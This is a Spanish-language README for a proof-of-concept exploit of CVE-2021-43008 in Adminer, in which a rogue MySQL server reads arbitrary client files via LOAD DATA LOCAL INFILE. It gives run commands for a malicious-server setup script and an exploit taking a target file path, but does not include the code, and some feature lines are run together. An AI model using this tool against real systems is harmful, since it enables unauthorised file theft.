
Adminer CVE-2021-43008 PoC
Exploit de prueba de concepto para CVE-2021-43008 que afecta a Adminer.
Esta vulnerabilidad permite que un servidor MySQL malicioso solicite archivos locales arbitrarios desde la máquina cliente cuando LOAD DATA LOCAL INFILE está habilitado.
El repositorio contiene herramientas para reproducir el ataque.
exploit.py
Script de Python que automatiza la interacción con Adminer.
Características:
LOAD DATA LOCAL INFILEsetup_mysql_server.sh
Script auxiliar que prepara un servidor MySQL/MariaDB malicioso para la explotación.
El script:
local_infilePython 3.x
Librerías: requests beautifulsoup4 lxml
Ejecute el script de configuración:
sudo ./script.sh <IP> <PORT>
Luego ejecute el exploit:
python exploit.py <adminer_url> <mysql_host> <username> <password> <database> <file_path>